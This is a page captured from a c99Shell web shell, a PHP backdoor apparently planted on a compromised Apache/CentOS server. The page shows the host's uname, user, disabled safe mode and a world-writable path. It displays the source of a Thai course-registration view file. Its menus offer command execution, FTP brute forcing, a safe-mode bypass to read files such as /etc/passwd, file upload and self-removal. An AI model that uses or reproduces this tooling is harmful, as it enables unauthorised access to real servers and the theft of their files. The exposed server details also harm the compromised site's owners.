!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis2222/application/views/eregis/   drwxrwxrwx
Free 50.65 GB of 127.8 GB (39.63%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_showCpub.php (2.05 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<script type="text/javascript" src="<?php echo base_url();?>js/jQuery-1.5.js"></script>
<script language="JavaScript">
    function checkall() {
        $('*:checkbox').attr('checked',true);
    }
</script>
<?php
    $attributes 
= array('id' => 'popform','name' =>'popform');
    echo 
form_open($this->config->item("rg_folder")."curpbri/cpub_insert_update"$attributes);
?>
<table width="100%" align="center">
<?php
    
if(isset($cpub)){
        if(
$cpub->num_rows() > 0){
?>
    <tr ><td>
        <table class="headCol">
            <tr>
                <th>เลือก</th>
                <th>หลักสูตร</th>
            </tr>
<?php
        $i 
0;
        foreach(
$cpub->result() AS $row){
            echo 
"<tr onmouseover=\"bgColor='".$tr_color_even."'\" onmouseout=\"bgColor='".$this->config->item("rg_mouseout")."'\">";
?>
                <td align='center'><? echo form_checkbox("curId[]"$row->cpubCurIdfalse); ?></td>
                <td class="indent"><? echo explodeSquare($row->curName);?></td>
            </tr>
<?php
            $i
++;
        }
?>

        </table>
    </td></tr>
    <tr >
        <td>
<?php
    $js 
'onClick="checkall()"';
    echo 
form_button('mybutton''เลือกทั้งหมด'$js); 
    
$data = array(
        
'name' => 'button',
        
'id' => 'button',
        
'value' => 'true',
        
'type' => 'reset',
        
'content' => 'ยกเลิกทั้งหมด'
    
);
    echo 
form_button($data);
?>
        </td>
    </tr>
    <tr >
        <td align='center'>
<?php
    $js 
'onClick="return confirm(\'ต้องการเผยแพร่หลักสูตรนี้ใช่หรือไม่\')"';
    echo 
form_submit('save''บันทึก'$js);
?>
        </td>
    </tr>
<?php
        
        
}else{
?>
    <tr><td>&nbsp;</td></tr>
    <tr><td align='center'><span class="error">ไม่พบหลักสูตรที่ยังไม่เผยแพร่</span></td></tr>
<?
        
}
    }
?>
</table>
</form>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0103 ]--